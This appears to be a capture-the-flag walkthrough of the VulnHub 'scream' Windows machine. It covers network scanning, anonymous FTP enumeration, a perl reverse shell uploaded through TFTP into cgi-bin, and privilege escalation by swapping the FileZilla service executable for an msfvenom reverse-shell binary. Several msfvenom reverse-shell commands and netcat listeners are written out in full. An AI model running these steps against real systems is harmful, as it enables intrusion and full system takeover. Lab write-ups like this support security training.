VulnHub: /dev/random: scream

ratiros01
9 min readMay 1, 2021

--

Initial foothold

  1. Network discovery
nmap -sn 10.0.2.27/24

My target is 10.0.2.28.

2. Port scan

nmap -Pn 10.0.2.28nmap -Pn -p1000- 10.0.2.28

There’re 4 open ports: 21, 22, 23, and 80.

3. OS and service scan

nmap -A -p21,22,23,80 10.0.2.28

There’re services as listed:

  • Port 21 WAR-FTPD 1.65 w/ anonymous login
  • Port 22 WeOnlyDo sshd 2.1.3 (protocol 2.0)
  • Port 23 telnet
  • Port 80 Tinyweb httpd 1.93

4. Vuln scan

nmap --script vuln -p21,22,23,80 10.0.2.28

No useful information.

Service Enumeration and exploitation

  1. FTP

Anonymous login

ftp 10.0.2.28Name: anonymousPassword: (empty)

Explore its directory

ls -laget bin

I don’t have any permission except READ.

Continue exploring

cd /binls -la

TINY.EXE indicates that this /bin may related to Tinyweb httpd service.

cd ../logls -la

There’re logs and the interesting one is OpenTFTPServerMT.log. This indicates that there may be running TFTP on this machine.

cd ../rootls -la

There’re index.html and cgi-bin. This may mean that this directory is storing data for Tinyweb httpd.

cd cgi-binls -la

No data here.

Next is to search for a public exploit script.

After searching for any exploits w/ google, I came across this.

When you read the code, you’ll notice winsock.h. This script is meant to be compiled on Windows.

To compile the script w/ Linux, in my experience, I always encounter many problems using Linux command line. So, I will use wine to install Dev-C, compile the script w/ Dev-C to get exe file, and finally run the exe w/ wine again.

First, download Orwell dev-c

wine Orwell\ Dev\ C++_5.7.1_Soft32.exe

Continue installation process as same as Windows

Copy the code

Compile, I encountered errors.

After googling, I found that I need to add “-lws2_32” to the compiler option.

Click Tools -> Compiler Options and add “-lws2_32” as shown in the snapshot.

Compile again, now I got an exe file.

Run the exe w/ wine

wine 3570.exe

Supply an option. Since the target system is XP sp3, I’ll use any options which are closest to the target.

wine 3570.exe 10.0.2.28 5

Connect to port 7777

telnet 10.0.2.28 7777

No shell

Use another option

wine 3570.exe 10.0.2.28 13

Connect to port 7777

telnet 10.0.2.28 7777

No shell

I also found another python script that was tested on Windows XP SP3. I’ll try to use this.

Read the script

I have to create new shellcode to match my machine. Here is my command.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows

Copy new shellcode to the python script and edit target IP.

Create Listener on port 443

rlwrap nc -lvp 443

Run the script

python warftp-ftp.py

Back to the listener, no shell. I’ll proceed to the next service

2. SSH

Connect

ssh 10.0.2.28

No matching key exchange found. Cannot connect.

Specify algorithm and encryption method

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc   10.0.2.28

Now I can connect.

Search for public exploits

Open metasploit and search for exploits

msfconsolesearch fresshd
use 2show options
set RHOST 10.0.2.28set LHOST 10.0.2.27set LPORT 443run -j

Failed. I’ll proceed to the next service.

3. Telnet

Connect

telnet 10.0.2.28 23

I don’t have any credentials.

4. HTTP

Access the site

View page source

Nikto

nikto -h http://10.0.2.28

Nothing

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.28/ -x php,txt,html,sh,cgi,bak -q

Nothing

5. Remember from FTP enumeration that there’s the TFTP log. It’s file transfer protocol based on UDP port 69. I’ll scan for open UDP port

nmap -sU -sV 10.0.2.28 -vvvv

There’s open UDP port 69.

7. TFTP

Remember from FTP enumeration, reverse shell perl script can be uploaded to cgi-bin.

I’ll upload test.txt, first I’ll change TFTP to binary mode

mode binaryput test.txt root/cgi-bin -> failedput test.txt /cgi-bin -> failedput test.txt cgi-bin/ -> failedput test.txt cgi-bin/test.txt -> succeeded

Now access /cgi-bin/test.txt

http://10.0.2.28/cgi-bin/test.txt

I can upload the file, but I cannot run.

Next is uploading perl “Hello World” script from this guide

put helloworld.pl cgi-bin/helloworld.pl -> succeeded

Access via http

Exploitation

  1. Prepare listener on port 443
rlwrap nc -lvp 443

2. Create reverse shell script, I used this guide

Copy only the perl code and edit IP and port to match your listener

Upload it

put exploit.pl cgi-bin/exploit.pl

Access it, there’s an error.

I edit the script as shown in the snapshot.

Upload again

put exploit.pl cgi-bin/exploit2.pl

Access it

3. Back to listener, now I got the shell

4. Verify the shell

echo %username%

Privilege Escaltion

  1. List system info
systeminfo

This machine is 32-bit.

2. List system task

tasklist   /FI "username eq SYSTEM"

I will replace an exe file w/ reverse shell. I’ll start w/ “FileZilla server.exe” because I don't have any permission except READ.

Let’s change directory to “\”

cd \dir

I could not change as expected. I need more reliable shell.

2. Create and upload another shell

Create listener on port 80

rlwrap nc -lvp 80

Create exe shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e   x86/shikata_ga_nai -f exe > shell.exe

Upload it w/ tftp

put shell.exe cgi-bin/shell.exe

Run the shell w/ listener on port 443

dirshell.exe

Back to listener om port 80, I got another shell

3. Replacing filezilla

On listener port 80

Find filezilla.exe path

dir "FileZilla server.exe" /s /b

Find task name

net start

Stop task

net stop "FileZilla Server FTP server"

Next is replacing another reverse shell

Back to attacker machine, create exe reverse shell on port 21

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.27 LPORT=80 -e   x86/shikata_ga_nai -f exe > shell2.exe

Upload w/ tftp

put shell2.exe cgi-bin/shell2.exe

Create listener on port 21

rlwrap nc -lvp 21

Back to shell/listener on port 21

cd \Program Files\FileZilla Server\dir

rename old exe file to be backup

rename "FileZilla server.exe" "FileZilla server.exe.bak"dir

Copy shell2.exe to replace filezilla

copy \www\root\cgi-bin\shell2.exe "FileZilla server.exe"dir

Start Filezilla task

net start "FileZilla Server FTP server"

Back to listener on port 21, judging by the path, I’m administrator (root).

--

--